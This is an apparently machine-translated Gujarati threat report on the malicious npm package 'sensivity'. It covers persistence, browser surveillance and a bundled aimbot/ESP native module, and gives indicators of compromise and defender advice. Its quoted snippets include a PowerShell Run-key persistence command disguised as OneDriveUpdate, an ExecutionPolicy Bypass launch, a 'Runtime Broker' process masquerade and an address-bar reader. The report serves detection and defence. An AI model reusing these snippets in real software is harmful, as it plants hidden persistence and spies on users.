TL; DR
npm પેકેજ સંવેદનશીલતા પોતાને "સેન્સિટિવિટી કંટ્રોલ પેનલ" તરીકે વર્ણવે છે. વિન્ડોઝ પર તે રિમોટ-કંટ્રોલ અને સર્વેલન્સ ટૂલ તરીકે વર્તે છે.
તેનો પ્રવેશ બિંદુ, launcher.js, તેની પોતાની પ્રક્રિયાનું નામ બદલીને રનટાઇમ બ્રોકર રાખે છે, નામનો ઓટોસ્ટાર્ટ રન-કી મૂલ્ય લખે છે OneDriveUpdate જે છુપાયેલા VBScript દ્વારા પેકેજને ફરીથી લોન્ચ કરે છે, PowerShell ને ઉત્પન્ન કરે છે -ExecutionPolicy Bypass, અને પછી 6.87 MB નેટિવ મોડ્યુલ સાથે 171 KB અસ્પષ્ટ સર્વર પેલોડનું મૂલ્યાંકન કરે છે, sens.node.
તે TCP પોર્ટ 3000 પર ફોન-પેરિંગ કંટ્રોલ પેનલની સેવા આપે છે અને Windows UIAutomation દ્વારા સક્રિય બ્રાઉઝરના એડ્રેસ-બાર URL વાંચે છે, એક હાર્ડ-કોડેડ YouTube વિડિઓ માટે જુએ છે.
બે ભાગો જે પહેલા બ્લેક બોક્સ તરીકે વાંચવામાં આવતા હતા તે હવે ઉકેલાઈ ગયા છે. અસ્પષ્ટ સર્વર, server.obf.js, obfuscator.io RC4 સ્ટ્રિંગ-એરે સ્કીમનો ઉપયોગ કરે છે; તેના ડીકોડરને ઑફલાઇન ફરીથી અમલમાં મૂકવાથી (જાવાસ્ક્રિપ્ટ ચલાવવામાં આવી નથી) એક જ બાહ્ય એન્ડપોઇન્ટ પુનઃપ્રાપ્ત થાય છે — https://izopi.com/check.php — સહી કરેલ લાઇસન્સ પ્રતિભાવો ચકાસવા માટે વપરાતી એમ્બેડેડ RSA પબ્લિક કી સાથે.
મૂળ મોડ્યુલ, sens.node, પેક કરેલ નથી: તેનું આયાત કોષ્ટક અને એમ્બેડેડ સ્ટ્રિંગ્સ તેને ડાયરેક્ટએક્સ 11 / ડિયર ઇમગુઇ ઇન-ગેમ ઓવરલે તરીકે ઓળખે છે જે એઇમ્બોટ, ઇએસપી (વોલ-હેક) અને ટ્રિગરબોટ સુવિધાઓ પ્રદાન કરે છે, જે રિમોટ-પ્રોસેસ ઇન્જેક્શન અને મેમરી રીડ/રાઇટ દ્વારા સંચાલિત છે.
તેની અંદરના સ્ટ્રિંગ્સ GTA V / FiveM સાથે સુસંગત વાહન એન્ટિટી અને નકશા સ્થાનોનો સંદર્ભ આપે છે. npm પેકેજ એ મૂળ મોડ્યુલની આસપાસ ડિલિવરી અને પર્સિસ્ટન્સ રેપર છે.
વ્યાખ્યાયિત સિગ્નલ કાર્યરત છે, ટેકનિકલ નહીં: એક અનામી પ્રકાશકે એક પેકેજના લગભગ સિત્તેર સંસ્કરણો રજૂ કર્યા - 2.5.0 દ્વારા 2.5.69 — થોડા દિવસો સુધી, દરેકમાં એક જ લોન્ચર હતું.
કોઈ ઇન્સ્ટોલેશન નથી hooks. પેલોડ ફક્ત ત્યારે જ ચાલે છે જ્યારે પેકેજ શરૂ થાય છે.
હુમલો: તે કેવી રીતે કાર્ય કરે છે
સેન્સિવિટી દસ ફાઇલો મોકલે છે. package.json છૂટાછવાયા છે: કોઈ રિપોઝીટરી ફીલ્ડ નથી, કોઈ લાઇસન્સ નથી, એક મુખ્ય અને બે બિન ઉપનામો (સેન્સિવિટી, સેન્સ) બધા launcher.js તરફ નિર્દેશ કરે છે, અને નોડ launcher.js ની સ્ટાર્ટ સ્ક્રિપ્ટ. કોઈ પોસ્ટઇન્સ્ટોલ અથવા પ્રીઇન્સ્ટોલ નથી. npm ઇન્સ્ટોલ પર કંઈપણ કામ કરતું નથી. નીચે વર્ણવેલ વર્તણૂક ત્યારે ચાલે છે જ્યારે વપરાશકર્તા પેકેજ શરૂ કરે છે — bin shim, start સ્ક્રિપ્ટ અથવા require દ્વારા.
ટારબોલમાં લોન્ચર, એક અસ્પષ્ટ સર્વર, નેટિવ મોડ્યુલ, વિઝ્યુઅલ બેઝિક સ્ક્રિપ્ટ અને કંટ્રોલ પેનલ માટે એક પબ્લિક/વેબ ડિરેક્ટરી હોય છે. launcher.js એ વાંચી શકાય તેવું ઓર્કેસ્ટ્રેટર છે; રનટાઇમ પર જે લોજિક મહત્વપૂર્ણ છે તે તે લોડ કરેલા બે બ્લોબમાં રહે છે - એક અસ્પષ્ટ સર્વર અને એક કમ્પાઇલ કરેલ નેટિવ મોડ્યુલ, બંને નીચે ઉકેલાયેલા છે.
પ્રોસેસ માસ્કરેડ અને નકલી OneDrive અપડેટર
અમલીકરણની શરૂઆતમાં launcher.js બે વાર પોતાનું પ્રક્રિયા નામ સેટ કરે છે:
javascript process.title = 'Runtime Broker'; રનટાઇમ બ્રોકર એ એક કાયદેસર વિન્ડોઝ પ્રક્રિયા (RuntimeBroker.exe) છે જે એપ્લિકેશન પરવાનગીઓની મધ્યસ્થી કરે છે. નોડ પ્રક્રિયાનું નામ બદલીને તેને મેચ કરવાનો અર્થ એ છે કે ટાસ્ક મેનેજર પર એક ઝડપી નજર નાખવી એ કંઈ અસામાન્ય બતાવતું નથી.
પર્સિસ્ટન્સ ડાયરેક્ટ રજિસ્ટ્રી API ને બદલે પાવરશેલ દ્વારા લખવામાં આવે છે:
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); ઓટોસ્ટાર્ટ મૂલ્યને OneDriveUpdate નામ આપવામાં આવ્યું છે, અને તે સીધા પેકેજ તરફ નિર્દેશ કરતું નથી. તે બંડલ કરેલ OneDrive.Standalone.Updater.vbs ચલાવતા wscript.exe તરફ નિર્દેશ કરે છે. તે સ્ક્રિપ્ટ છુપાયેલી વિંડોમાં નોડ launcher.js ને ફરીથી લોન્ચ કરે છે. Run-key નામ અને VBScript ફાઇલનામ બંને Microsoft બ્રાન્ડિંગ ઉધાર લે છે, તેથી ઓટોસ્ટાર્ટ એન્ટ્રી નિયમિત OneDrive કાર્ય તરીકે વાંચવામાં આવે છે.
એક્ઝેક્યુશન-પોલિસી બાયપાસ સાથે પાવરશેલ
લોન્ચર વારંવાર પાવરશેલ તરફ જાય છે. સ્કેનર્સ જે સિંકને ક્રિટિકલ તરીકે ફ્લેગ કરે છે તે એક્ઝેક્યુશન પોલિસી અક્ષમ કરીને જનરેટ થયેલ .ps1 નું લોન્ચિંગ છે:
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); એક્ઝેક્યુશનપોલિસી બાયપાસ તે ઇન્વોકેશન માટે સ્થાનિક સ્ક્રિપ્ટ-સાઇનિંગ ચેકને દૂર કરે છે. જનરેટ કરેલી સ્ક્રિપ્ટ્સ આગામી વિભાગમાં વર્ણવેલ બ્રાઉઝર-સર્વેલન્સ અને વિન્ડો-ડિટેક્શન કાર્યને હેન્ડલ કરે છે.
અસ્પષ્ટ સર્વર અને મૂળ મોડ્યુલ
સેટઅપ પછી, launcher.js તેના વાસ્તવિક પેલોડને લોડ કરે છે અને એક્ઝિક્યુટ કરે છે:
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js એ 171 KB _0x-એરે ઓબ્ફસ્કેશન છે — જાવાસ્ક્રિપ્ટ પેટર્ન જ્યાં દરેક સ્ટ્રિંગ અને ઓળખકર્તાને ઇન્ડેક્સ દ્વારા શફલ્ડ એરેમાં બદલવામાં આવે છે, પછી રનટાઇમ પર ડી-રેફરન્સ કરવામાં આવે છે. આ સ્કીમ obfuscator.io દ્વારા ઉત્પાદિત RC4 વેરિઅન્ટ છે: એક સિંગલ ડીકોડર ફંક્શન base64-એરે એન્ટ્રીને ડીકોડ કરે છે અને પછી RC4-પર-કોલ કી વડે તેને ડીક્રિપ્ટ કરે છે. તે ડીકોડરને એક અલગ સ્ક્રિપ્ટમાં ફરીથી અમલમાં મૂકવાથી — એક્સટ્રેક્ટેડ 821-એન્ટ્રી સ્ટ્રિંગ એરે પર ફક્ત રી-ઇમ્પ્લીમેન્ટેશન ચલાવીને, પેકેજની પોતાની જાવાસ્ક્રિપ્ટ ક્યારેય નહીં — તેને સ્વચ્છ રીતે ખોલે છે. કઈ સપાટીઓ સામાન્ય છે પરંતુ ડીcisive: એક બાહ્ય URL, https://izopi.com/check.php`, જે LICENSE_URL કોન્સ્ટન્ટને સોંપેલ છે; એક એમ્બેડેડ RSA PUBLIC_KEY_PEM`; સ્થાનિક પેનલ /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, અને /trigger/status ને રૂટ કરે છે; અને child_process, crypto, અને [Sensivity] sens.node લોડ થયેલ સ્ટ્રિંગ્સ - છેલ્લી ચોક્કસ લોગ લાઇન છે જે લોન્ચર લોડ કરેલા પ્રોગ્રામ મોડ્યુલ પર ફરીથી લખે છે. એન્ડપોઇન્ટ એ લાઇસન્સ ચેક છે: ક્લાયંટ એક ઓળખકર્તા પોસ્ટ કરે છે (અસ્પષ્ટ સર્વર ડિસ્કોર્ડ ID ને ફોર્મેટ કરે છે: %s સ્ટ્રિંગ) અને RSA કી સર્વરના સહી કરેલા પ્રતિભાવને ચકાસે છે.
sens.node એ 6.87 MB કમ્પાઇલ કરેલું નેટીવ એડઓન છે, અને તે પેક્ડ નથી - સેક્શન એન્ટ્રોપી 5.6–6.6 પર બેસે છે અને PE આયાત અને નિકાસ કોષ્ટકો અકબંધ છે, તેથી તેની ક્ષમતાઓ સીધી વાંચી શકાય છે. તે napi_register_module_v1 નિકાસ કરે છે, standard નોડ N-API એન્ટ્રી પોઈન્ટ, તેથી eval'd સર્વર તેને પ્લેન રિક્વાયર સાથે લોડ કરે છે. તેનું આયાત કોષ્ટક ટેલ છે. KERNEL32 થી તે OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules અને Process32First/NextW ખેંચે છે - બીજી પ્રક્રિયા શોધવા, તેની અંદર મેમરી ફાળવવા અને તે મેમરી વાંચવા અથવા લખવા માટેનો કેનોનિકલ સેટ. USER32 થી તે GetAsyncKeyState, GetKeyState, mouse_event અને SetCursorPos ખેંચે છે; તે ઓન-સ્ક્રીન ઓવરલે માટે d3d11.dll, D3DCOMPILER_43 અને dwmapi ને અને નેટવર્ક કોલ્સ માટે સંપૂર્ણ WINHTTP સેટને લિંક કરે છે. તેના એમ્બેડેડ સ્ટ્રિંગ્સ અસ્પષ્ટતા વિના ફીચર સેટને નામ આપે છે: સક્ષમ કરો Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP બિલ્ડર, Vehicle ESP, Electron Anticheat detected, અને Dear ImGui બેનર Dear ImGui 1.91.3 WIP. સ્થાન અને એન્ટિટી સ્ટ્રિંગ્સ જેમ કે Grapeseed Medical Clinic અને vehicle-ESP શબ્દભંડોળ GTA V / FiveM સાથે સુસંગત છે.
આ વિભાજન ઇરાદાપૂર્વક કરવામાં આવ્યું છે: વાંચી શકાય તેવા launcher.js ફક્ત તે ભાગો ધરાવે છે જે સ્કેનર સરળતાથી વાંચે છે - પર્સિસ્ટન્સ, માસ્કરેડ, ઇવલ કોલ પોતે - જ્યારે અસ્પષ્ટતા એક બાહ્ય હોસ્ટને રનટાઇમ સંપર્કો છુપાવે છે, અને બાઈનરી ગેમ-ઓવરલે અને પ્રોસેસ-ઇન્જેક્શન લોજિક ધરાવે છે. લોન્ચર પાતળો, ઓડિટેબલ શેલ છે; અસ્પષ્ટ સર્વર નેટવર્ક ઓળખ છુપાવે છે; મૂળ મોડ્યુલ પેલોડ છે. અમે બાઈનરીના આયાત અને સ્ટ્રિંગ્સને વાંચેલા તરીકે વર્ણવીએ છીએ; અમે તેમાંથી ઓપરેટરનો હેતુ અનુમાન કરતા નથી.
પોર્ટ 3000 પર ફોન-પેરિંગ કંટ્રોલ પેનલ
લોન્ચર TCP પોર્ટ 3000 પર સ્થાનિક વેબ સર્વરનું સંચાલન કરે છે અને તેને સિંગલટન તરીકે ગણે છે. તે હાલના શ્રોતા માટે ક્વેરી કરે છે અને બાઇન્ડિંગ કરતા પહેલા તેને સાફ કરે છે:
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); આ પેનલ http://localhost:3000 પર પહોંચી શકાય છે, જેમાં http://192.168.1.16:3000 ના હાર્ડ-કોડેડ LAN ફોલબેક URL છે. પબ્લિક/ ડિરેક્ટરી અને પેનલનું વર્તન QR-પેરિંગ ફ્લો સાથે સુસંગત છે: ફોન કોડ સ્કેન કરે છે અને રિમોટ તરીકે હોસ્ટ સાથે જોડાય છે. લોન્ચરમાં કોઈ બાહ્ય કમાન્ડ-એન્ડ-કંટ્રોલ ડોમેન સ્પષ્ટ ટેક્સ્ટમાં દેખાતું નથી - પરંતુ, જેમ ઉપર ડિઓબ્ફસ્કેશન બતાવે છે, એક અસ્પષ્ટ સર્વરમાં હાજર છે: izopi.com લાઇસન્સ એન્ડપોઇન્ટ. પેનલ પોતે સ્થાનિક અને LAN-સ્કોપ્ડ છે; એકમાત્ર આઉટબાઉન્ડ હોસ્ટ તે લાઇસન્સ ચેક છે.
એક અલગ સુપરવાઇઝર/વર્કર મોડેલ પ્રક્રિયાને જીવંત રાખે છે. લોન્ચર SENSIVITY_SUPERVISOR અને SENSIVITY_WORKER પર્યાવરણ ફ્લેગ્સ સાથે પોતાને ફરીથી ઉત્પન્ન કરે છે, દરેક ચાઇલ્ડ છુપાયેલું ચાલે છે, તેથી એક પ્રક્રિયાને બંધ કરવાથી તેને ફરીથી શરૂ કરવા માટે એક વોચડોગ રહે છે.
બ્રાઉઝર સર્વેલન્સ અને YouTube સિગ્નલ
સૌથી ચોક્કસ વર્તણૂક બ્રાઉઝર મોનિટરિંગ છે. launcher.js પાવરશેલ બનાવે છે જે વિન્ડોઝ UIAutomation ને ચાલી રહેલા બ્રાઉઝરના એડ્રેસ બારને વાંચવા માટે ચલાવે છે:
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ValuePattern UI તત્વની ટેક્સ્ટ સામગ્રી પરત કરે છે. બ્રાઉઝરના એડ્રેસ-બાર એડિટ કંટ્રોલ પર લાગુ કરીને, તે પીડિત હાલમાં જે URL જોઈ રહ્યો છે તે પરત કરે છે — બ્રાઉઝર એક્સટેન્શન વિના, ડિસ્ક પર પ્રોફાઇલને સ્પર્શ કર્યા વિના, અને API હૂક વિના. જનરેટ થયેલ સ્ક્રિપ્ટ $browserNames સૂચિને પુનરાવર્તિત કરે છે અને જે પણ બ્રાઉઝર ફોરગ્રાઉન્ડમાં હોય તેનું URL અથવા વિન્ડો શીર્ષક કાઢે છે.
તે URL એક જ હાર્ડ-કોડેડ લક્ષ્ય સામે પરીક્ષણ કરવામાં આવ્યું છે:
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; યુટ્યુબ બતાવતી બ્રાઉઝર વિન્ડો માટે ત્રણ-સેકન્ડના લૂપ પર લોન્ચર પોલ્સ, અને જનરેટ થયેલ પાવરશેલ એક ગેટ-યુટ્યુબબ્રાઉઝર / ટેસ્ટ-ટાર્ગેટયુટ્યુબયુઆરએલ જોડી ધરાવે છે જે તે વિડિઓ ID સાથે મેળ ખાય છે. અવલોકનક્ષમ અસર બેવડી છે: સક્રિય બ્રાઉઝિંગ URL પીડિતની સ્ક્રીન પરથી વાંચવામાં આવે છે, અને એક ચોક્કસ યુટ્યુબ વિડિઓ સાથે હોસ્ટની ક્રિયાપ્રતિક્રિયા શોધી કાઢવામાં આવે છે. અમે મિકેનિઝમ અને લક્ષ્યનું વર્ણન કરીએ છીએ; અમે તેમાંથી કોઈ હેતુ અનુમાન કરતા નથી.
સ્કેનર sensitive_data_enumeration - એક Process::env અને UIAutomation સોર્સને નેટવર્ક-સક્ષમ રનટાઇમ ફીડ કરે છે તે એડ્રેસ-બાર રીડ એ છે. તે એકાંતમાં સૌમ્ય દેખાય છે અને UIAutomation સોર્સથી અસ્પષ્ટ સર્વર પર ડેટા લાઇફસાઇકલ ટ્રેસ થયા પછી જ સર્વેલન્સનો ઉકેલ લાવે છે.
સમયરેખા અને સંસ્કરણ ઉત્ક્રાંતિ
સંવેદનશીલતા એક જ વાર અપલોડ થતી નથી. પ્રકાશક ખાતામાં આ સિંગલ પેકેજના લગભગ સિત્તેર પ્રકાશિત સંસ્કરણો છે, અને સમીક્ષા વિંડો દરમિયાન નવા આવતા રહ્યા. લોન્ચર 2.5.x લાઇનમાં સુવિધા દ્વારા સુવિધામાં વધારો કરે છે જ્યારે તેની ટકાઉપણું અને પેલોડ-લોડિંગ સ્થિર રહે છે.
| તારીખ (UTC) | અવલોકન કરેલ આવૃત્તિઓ | લોન્ચર સ્થિતિ |
|---|---|---|
| 2026-06-02 | 2.5.8 - 2.5.46 (25) | બેઝ QR-પેનલ લોન્ચર; રન-કી પર્સિસ્ટન્સ; અસ્પષ્ટ સર્વરનું મૂલ્યાંકન. |
| 2026-06-03 | 2.5.53 - 2.5.61 (6) | સમાન ફિંગરપ્રિન્ટ; કન્સોલ-ટ્રેસ સપ્રેશન. |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | પિન કરેલ YouTube સગાઈ લક્ષ્ય ઉમેરે છે wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 - 2.5.69 (24) | શ્રેણીમાં ખાલી જગ્યાઓનું પુનઃપ્રકાશન; સુપરવાઇઝર/કાર્યકર વોચડોગ. |
ડાઉનલોડ કરેલા પ્રતિનિધિઓ - 2.5.0, 2.5.36, અને 2.5.69 - માં લોન્ચરને વાંચવાથી ચાર સ્તરો દેખાય છે. સૌથી પહેલાના બિલ્ડ્સમાં બેઝ QR-પેરિંગ લોન્ચર હોય છે. 2.5.33 થી UIAutomation એડ્રેસ-બાર હાર્વેસ્ટર દેખાય છે. 2.5.58 થી સુપરવાઇઝર-મેનેજમેન્ટ લેયર ઉમેરવામાં આવે છે. 2.5.64 થી ડિટેચ્ડ સુપરવાઇઝર/વર્કર વોચડોગ સેટ પૂર્ણ કરે છે. આ દરમિયાન, ચાર વસ્તુઓ ક્યારેય બદલાતી નથી: OneDriveUpdate Run કી, OneDrive.Standalone.Updater.vbs ડ્રોપર, eval'd server.obf.js અને sens.node નેટિવ મોડ્યુલ.
2026-06-05 તરંગ નોંધપાત્ર છે કારણ કે તેણે નીચા સંસ્કરણ નંબરો - 2.5.0 થી 2.5.15 - ફરીથી પ્રકાશિત કર્યા હતા જે દિવસો પહેલા પુષ્ટિ થયેલ સંસ્કરણો નીચે બેસે છે. અસર રજિસ્ટ્રી પર એક સંલગ્ન 2.5.x લાઇન છે, દરેક સંસ્કરણ સમાન લોન્ચર ધરાવે છે.
સમાધાનના સૂચકો
નીચેના બધા સૂચકાંકો પેકેજ ટારબોલમાંથી સીધા વાંચવામાં આવ્યા હતા. વાંચી શકાય તેવા લોન્ચરમાં ફક્ત લૂપબેક અને એક જ ખાનગી LAN સરનામું છે; એક બાહ્ય હોસ્ટનામ, izopi.com, server.obf.js ને ઑફલાઇન ડિઓબફસ્કેટ કરીને પુનઃપ્રાપ્ત કરવામાં આવ્યું હતું.
| પ્રકાર | સૂચક | નોંધો |
|---|---|---|
| પેકેજ | npm:sensivity (≈70 આવૃત્તિઓ, 2.5.0-2.5.69) | સિંગલ-પેકેજ પ્રકાશક; કોઈ ભંડાર નથી; લાઇસન્સ વિનાનું. |
| ફાઇલ | launcher.js | વાંચી શકાય તેવા ઓર્કેસ્ટ્રેટર; મુખ્ય અને બિન લક્ષ્ય. |
| ફાઇલ | server.obf.js (≈૧૭૧ કેબી) | obfuscator.io RC4 સ્ટ્રિંગ-એરે પેલોડ, મારફતે લોડ થયેલ eval(fs.readFileSync(...)). |
| ફાઇલ | sens.node (≈6.87 એમબી) | PE32+ x86-64 નોડ N-API એડઓન; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| ફાઇલ | OneDrive.Standalone.Updater.vbs | છુપાયેલ રીલોન્ચર (node launcher.js). |
| નેટવર્ક | https://izopi.com/check.php | અસ્પષ્ટ સર્વરમાંથી લાઇસન્સ/પ્રમાણીકરણ એન્ડપોઇન્ટ પુનઃપ્રાપ્ત થયું; એમ્બેડેડ RSA પબ્લિક કી પ્રતિભાવોની ચકાસણી કરે છે. |
| ક્ષમતા | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | રિમોટ-પ્રોસેસ ઇન્જેક્શન અને મેમરી વાંચવા/લેવાની ક્ષમતા. |
| ક્ષમતા | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | ડાયરેક્ટએક્સ ૧૧ / ઇમગુઇ ગેમ ઓવરલે એઇમ્બોટ, ઇએસપી અને ટ્રિગરબોટ સુવિધાઓનો અમલ કરે છે. |
| રજિસ્ટ્રી | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | ઓટોસ્ટાર્ટ મૂલ્ય નિર્દેશ કરે છે wscript.exe અને VBScript લોન્ચર. |
| પ્રક્રિયા | process.title = 'Runtime Broker' | કાયદેસર વિન્ડોઝ રનટાઇમ બ્રોકર પ્રક્રિયા તરીકે માસ્કરેડ કરે છે. |
| વર્તણૂક | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | જનરેટ કરેલ પાવરશેલ સ્ક્રિપ્ટો માટે એક્ઝેક્યુશન-પોલિસી બાયપાસનો ઉપયોગ થાય છે. |
| વર્તણૂક | UIAutomation ValuePattern બ્રાઉઝર એડ્રેસ બાર વાંચવું | ફોરગ્રાઉન્ડ બ્રાઉઝર વિન્ડોનું URL વાંચે છે. |
| વર્તણૂક | લક્ષ્ય વિડિઓ ID wJWta2lO0Lw; 3-સેકન્ડનું YouTube મતદાન | પિન કરેલ સગાઈ-મોનિટરિંગ સિગ્નલ. |
| નેટવર્ક | http://localhost:3000, ફોલબેક http://192.168.1.16:3000 | QR-પેરિંગ કંટ્રોલ પેનલ સ્થાનિક રીતે અને LAN પર ખુલ્લું. |
| પર્યાવરણ | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | અલગ વોચડોગ પ્રક્રિયા સંકલન ફ્લેગ્સ. |
એટ્રિબ્યુશન, અસર અને બચાવકર્તાઓ
આ પેકેજ એક જ npm એકાઉન્ટ દ્વારા પ્રકાશિત કરવામાં આવે છે જેનું ઇમેઇલ સરનામું ચકાસાયેલ નથી અને ચકાસાયેલ નથી. આ એકાઉન્ટ રજિસ્ટ્રી પ્રતિષ્ઠા સ્કોરમાં ખૂબ જ નકારાત્મક છે, ફક્ત આ એક પેકેજ જાળવે છે અને પ્રકાશિત કરે છે, અને તેમાં કોઈ લિંક્ડ સોર્સ રિપોઝીટરી નથી. અમે ઇમેઇલની માલિકી ચકાસેલી નથી અને અમે ઝુંબેશને પ્રકાશક એકાઉન્ટને આભારી છીએ, કોઈ નામવાળી વ્યક્તિને નહીં. લોન્ચરમાં કોઈ સ્પષ્ટ ટેક્સ્ટ ઇન્ફ્રાસ્ટ્રક્ચર નથી, પરંતુ એક બાહ્ય હોસ્ટ હવે જાણીતો છે: અસ્પષ્ટ સર્વર લાઇસન્સ તપાસ માટે izopi.com નો સંપર્ક કરે છે, અને મૂળ મોડ્યુલ - સૂચના-દર-સૂચનાને બદલે તેના આયાત કોષ્ટક અને સ્ટ્રિંગ્સમાંથી વાંચવામાં આવે છે - એક રમત ઓવરલે છે જે બીજી પ્રક્રિયાની મેમરીમાં ઇન્જેક્ટ કરે છે અને વાંચે છે.
આ અવલોકનક્ષમ અસર વિન્ડોઝ વપરાશકર્તાઓ પર પડે છે જેઓ કંટ્રોલ-પેનલ યુટિલિટીની અપેક્ષા રાખીને સંવેદનશીલતા ઇન્સ્ટોલ કરે છે અને ચલાવે છે. તે હોસ્ટ્સ પર પેકેજ OneDrive કાર્ય તરીકે છૂપાયેલા ઓટોસ્ટાર્ટ પર્સિસ્ટન્સ સ્થાપિત કરે છે, સિસ્ટમ પ્રક્રિયાની નકલ કરવા માટે પોતાનું નામ બદલી નાખે છે, વપરાશકર્તા જે પણ બ્રાઉઝ કરી રહ્યો છે તેનું URL વાંચે છે, અને એક પેરિંગ પેનલ ઊભું કરે છે જે મશીનને સ્થાનિક નેટવર્ક પર રિમોટ સાથે જોડે છે. સુપરવાઇઝર/વર્કર વોચડોગનો અર્થ એ છે કે એક જ પ્રક્રિયા કિલ તેને દૂર કરતું નથી; રન-કી એન્ટ્રી રીબૂટ થવાથી બચી જાય છે. macOS અને Linux લોન્ચર દ્વારા લક્ષિત નથી - પર્સિસ્ટન્સ, પાવરશેલ અને UIAutomation પાથ ફક્ત Windows-માત્ર છે.
સિત્તેર-આવૃત્તિનું ચર્ન એ ટ્રેન્ડ છે જેને ફ્લેગ કરવા યોગ્ય છે. થોડા દિવસોમાં એક પેકેજને ડઝનેક વખત ફરીથી પ્રકાશિત કરવાથી, જેમાં પહેલાથી જ દૂર કરાયેલા સંસ્કરણ નંબરો કરતા ઓછા સંસ્કરણ નંબરોને બેક-ફિલિંગનો સમાવેશ થાય છે, દૂર કરવા વચ્ચે રજિસ્ટ્રી પર લાઇવ કોપી રહે છે અને સંસ્કરણ-પિન કરેલી બ્લોકલિસ્ટ્સને નિરાશ કરે છે. sensivity@2.5.61 માટે બ્લોકલિસ્ટ એન્ટ્રી બીજા દિવસે ફરીથી પ્રકાશિત થયેલ sensivity@2.5.3 સામે કંઈ કરતી નથી.
બચાવકર્તાઓ નીચેની બાબતો પર કાર્ય કરી શકે છે:
- રજિસ્ટ્રી-પ્રોક્સી અને CI અલોલિસ્ટમાં પેકેજ નામની સંવેદનશીલતાને સંપૂર્ણપણે અવરોધિત કરો. વ્યક્તિગત સંસ્કરણોને પિન કરવાથી પુનઃપ્રકાશન કેડન્સ ગુમાવે છે; નામ ટકાઉ સૂચક છે.
- OneDriveUpdate નામના રન મૂલ્યની શોધ કરો જેનો ડેટા પ્રતિ-વપરાશકર્તા પાથમાં .vbs સામે wscript.exe ને બોલાવે છે. વાસ્તવિક OneDrive અપડેટર આ રીતે નોંધાયેલ નથી.
- જે Node.js પ્રક્રિયા process.title રનટાઇમ બ્રોકર છે તેના પર ચેતવણી. વાસ્તવિક બ્રોકર RuntimeBroker.exe છે, નોડ રનટાઇમ નહીં.
- કમ્પાઇલ કરેલા .node એડઓન અને સિબલિંગ .obf.js ફાઇલના eval(fs.readFileSync(…)) મોકલતા પેકેજોના npm ઇન્સ્ટોલ-ટાઇમ ફેચને ફ્લેગ કરો. તે પેરિંગ - અસ્પષ્ટ ટેક્સ્ટ પેલોડની બાજુમાં લોડ થયેલ અપારદર્શક મૂળ બાઈનરી - અહીં માળખાકીય ટેલ છે, કોઈપણ સ્ટ્રિંગ IOC થી સ્વતંત્ર.
- મેનેજ્ડ વિન્ડોઝ એન્ડપોઇન્ટ્સ પર અણધારી નોડ પ્રક્રિયા દ્વારા ઉત્પન્ન થયેલા પોર્ટ 3000 પરના કોઈપણ સ્થાનિક રીતે બંધાયેલા શ્રોતાને શંકાસ્પદ ગણો.
- ડેવલપર અથવા એન્ડ-યુઝર હોસ્ટ્સ તરફથી izopi.com પર આઉટબાઉન્ડ વિનંતીઓ પર બ્લોક અથવા ચેતવણી આપો; તે પેકેજનો એકમાત્ર બાહ્ય એન્ડપોઇન્ટ છે, જે અસ્પષ્ટ સર્વરથી /check.php પર પહોંચે છે.
- કોઈપણ બંડલ કરેલ .node એડઓન માટે, તેના પર વિશ્વાસ કરતા પહેલા તેના આયાત કોષ્ટકનું નિરીક્ષણ કરો. OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread સંયોજન એ રિમોટ-પ્રોસેસ ઇન્જેક્શન છે, ભલે પેકેજ શું કરવાનો દાવો કરે છે; અહીં તે Direct3D ઓવરલે અને aimbot/ESP/triggerbot સ્ટ્રિંગ્સની બાજુમાં બેસે છે.
સ્ટેટિક-વિશ્લેષણ માટે pipelines, સમગ્ર વર્ઝન ચર્નમાં કન્વિક્શન આકાર ટકાઉ છે: નોન-નેટવર્ક ઇન્સ્ટોલ પ્રોફાઇલ, જાણીતા સિસ્ટમ-પ્રોસેસ નામ માટે પ્રોસેસ-ટાઇટલ સોંપણી, પાવરશેલ દ્વારા રન-કી રાઇટ, અને ડિસ્કમાંથી વાંચેલી ફાઇલનું મૂલ્યાંકન. આમાંથી કોઈ પણ ડોમેન, IP અથવા વર્ઝન નંબર પર આધાર રાખતું નથી જેને આગામી પુનઃપ્રકાશન ફેરવી શકે છે.
સંદર્ભ
[npm: સંવેદનશીલતા] – અહીં ચર્ચા કરાયેલ પેકેજ વર્ઝન લાઇન માટે રજિસ્ટ્રી પેજ; દૂર કરવાને આધીન.





